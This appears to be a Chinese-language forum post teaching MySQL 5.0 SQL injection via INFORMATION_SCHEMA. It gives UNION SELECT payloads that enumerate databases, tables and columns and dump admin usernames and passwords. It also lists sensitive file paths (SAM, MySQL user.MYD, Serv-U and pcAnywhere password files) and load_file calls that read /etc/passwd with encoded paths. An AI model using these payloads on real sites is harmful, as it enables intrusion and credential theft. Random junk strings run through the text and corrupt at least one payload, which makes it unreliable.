mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
5 a* |/ O6 S5 H9 f, H

) H' m" B7 d7 }
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
  O, K$ S1 ]" }4 _0 J8 g+ j* Z明。
1.得到所有数据库名：
% ^3 T( |) R% \+ @* @' E|SCHEMATA ->存储数据库名的表
  z- E  _+ n) J6 }|—字段：SCHEMA_NAME ->数据库名称

1 Z) b# d5 K7 `|TABLES ->存储表名
( x* M  P  X  i: X( S7 `  g|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
9 k& g; u, s- G8 x$ x
3 \0 @' F* t. E* j|COLUMNS ->存储的字段名表
$ P2 O4 [7 u: a) Q% ^2 r|—字段：TABLE_SCHEMA ->该字段所属数据库名
( h) C& M$ o9 L7 x( b|—字段：TABLE_NAME ->存储所属表的名称

/ u( Q2 f: a, f0 t) i0 D; X|—字段：COLUMN_NAME ->该字段的名称
$ e0 `: r& B( v# ]# E
/ W! N( K' D, W#########################################################################
##

0×001 获取系统信息:

union select 1,2,3,4,5,concat
2 _9 R3 h8 V: M(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

( }& I' P, L2 G6 F7 _6 Z/*
7 ^8 b) u* a* Q1 H* H
& S9 q, B. t/ T@@global.version_compile_os 获取系统版本

5 w  Q) @( Q+ K7 @8 `@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值

- H" n" O( `( a*/
9 A* g& I5 r+ e2 f/ `2 S
######################################################################
: k' W0 N% k  W& K4 |+ t+ G
$ K) ~  B+ ]+ {2 ^9 Q, X1 B  r0×002 获取表名

" L5 L% R2 \+ q  x$ Tunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
+ V; V2 ]4 o/ l  [3 k& M
# H9 h" R0 F: e! k- R/*
7 L' ^3 j0 P% Z; f' H; u
0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

& U' B2 d' @. F6 x+ E1 B- R/ z*/
* X4 j2 F1 P$ G
9 Q* r9 u; [5 _0 O0 a7 G% y######################################################################

( Q+ s1 b" F0 I, e0×003 获取字段
5 P$ Z; X6 b6 f0 ^
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
+ [& D" i$ u* X7 L
. H2 ^/ J7 w4 w7 @6 f
$ S8 |  t7 n( u5 d( ^table_schema=0x67617264656e limit 1 /*
/ h) O1 Y! u2 e/ O4 m; H+ N( T
0 o! n- T% B$ b( Y& Z9 z/*
  s, p+ E. k' v2 M
& e0 V) Z: p/ \2 m$ y& X* Dgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
/ C& H  [0 Q0 y5 [- S
! H1 S4 j4 H4 B- t, x) J! V0x61646d696e ->选择一个表
+ v2 R  x( v1 z; C0 y4 K% P
) B6 K9 ~- ]2 \2 ~' B7 G0x67617264656e ->数据库名
# ~$ z+ e2 D: s8 R
*/
, E, W4 l: N5 s' A4 R
#####################################################################
- T7 q; j; y$ o6 ?5 v& S4 h3 G- R  s
9 Z4 Q8 o5 n' l& W0×004 获取数据

. A, w* ]# @" j4 Q# M  Zunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
4 }  _0 N, o& i% [3 k" z
/*
' ?2 T9 u3 W7 H% J6 ]) e
  N  J, [- V# P7 p1 }7 ?! V- b0x3c62723e 换行符号HEX编码

) f+ R. w3 s0 M8 L# b# F5 Wgroup_concat 同时获得该字段所有数据
" y  z5 _5 p/ E4 y
  F+ u5 ]9 U. O# v& @: ^& R; O! H% M*/



, ?7 T$ u. W9 c% q1 g
( G7 q" r* l# r# Y) H
顺便添加一些mysql注入时非常有用的一些东西

简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
  R! E$ L; p; }! ]( f2:user()        用户名
3:current_user()  当前用户名
$ x/ x. r2 M- E3 M1 E0 E2 u, G2 _4:session_user()连接数据库的用户名
% p3 N0 n: B! Q: U$ G. w) t3 M5:database()    数据库名
% i- ~0 I9 o! k, X% v. R. h6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
5 r$ p! }# E/ K8@datadir     读取数据库路径
* p" O; P" h' r+ q! t( \' `+ j9@basedir    MYSQL 安装路径
* G0 W- t5 q! y# a& S10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
3 N1 d8 z1 \0 j8 P/ c; ^5 z5 RWINDOWS下:
c:/boot.ini          //查看系统版本
# c+ g: Z* Q( {  p; l' T7 B" Yc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
9 ?/ h: `# u5 h% W/ _0 p" g5 @. `c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
% d3 O" x" z, |3 ~. z! L1 ^c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
( W* ^$ W( ?) F3 N, M$ Dc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
0 _% `  `: ~  ~  [' f; p3 Rc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
5 F5 m$ p' s5 {9 ^& ]3 V$ T//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


. h  K% V$ [" H% `1 f* ?c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
2 l2 [0 L+ v/ h2 }' X( r4 X8 Zc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
1 x; ]9 p3 N1 o& ~C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
! N4 `) b$ S/ j7 s: L
/ x* R5 H0 ]4 r3 ]LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
% t- e% P# y  j+ n- Z. J/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
( E* A! t3 Z" ^6 u7 i" f/etc/httpd/conf/httpd.conf // apache配置文件
+ S9 W' ?: y2 z* N4 d/etc/rsyncd.conf //同步程序配置文件
" `" g' @6 o6 G3 x3 i) x& {: e/etc/my.cnf //mysql的配置文件
6 {% l* t" M) s" K6 ?/etc/redhat-release //系统版本
- ]/ _) V* f2 \9 m! ~9 i, W/etc/issue
  H" k0 ~- w) r& s, t  |/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
) F3 ?3 @; }* w6 d7 }/ e/ n% d/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
6 x2 I. a1 h( }" R9 m/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
# b4 C: g% t5 A, K/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
0 b  T8 P  J6 a3 Z/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
" I# E% a' a# d/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
" V3 ?+ H- a  [  c3 n& rload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
# X/ o0 m+ x& O6 a/ H5 Q; n上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.